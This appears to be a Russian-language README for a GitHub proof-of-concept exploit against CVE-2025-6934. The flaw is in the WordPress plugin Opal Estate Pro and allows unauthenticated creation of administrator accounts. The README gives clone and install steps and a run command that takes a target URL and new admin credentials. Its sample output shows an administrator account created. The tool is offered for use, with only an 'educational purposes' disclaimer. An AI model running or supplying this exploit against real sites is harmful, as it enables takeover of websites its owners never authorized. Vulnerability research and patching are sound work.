
Эксплойт для проверки концепции для CVE-2025-6934, критической уязвимости плагина WordPress Opal Estate Pro, позволяющей создать учётную запись администратора без аутентификации. Включает автоматическое определение версии, извлечение nonce и эксплуатацию AJAX-эндпоинта.
📖 Описание
Этот репозиторий содержит эксплойт Proof of Concept (PoC) для CVE-2025-6934,
критической уязвимости в плагине WordPress: Opal Estate Pro <= 1.7.5, которая позволяет создавать учетные записи администратора без аутентификации.
⚠️ Отказ от ответственности: Данный инструмент предоставляется только в образовательных целях и для исследований в области безопасности.
Автор не несет ответственности за любое неправомерное использование или причиненный ущерб.
readme.txtКлонируйте репозиторий и установите зависимости:
git clone https://github.com/yukinime/CVE-2025-6934.git
cd CVE-2025-6934
pip3 install -r requirements.txt
requirements.txt
requests
beautifulsoup4
colorama
Запустите скрипт с указанием цели:
python3 CVE-2025-6934.py -u http://target.com/ -mail [email protected] -password MySecurePass123 -user newadmin
✅ Пример вывода:
[✔] Eksploitasi Berhasil!
Username : newadmin
Email : [email protected]
Password : MySecurePass123
Role : administrator
Скриншот эксплойта
Cyberlone Indonesia (Cyberlone)
Этот проект лицензирован на условиях лицензии MIT – см. LICENSE для получения подробной информации.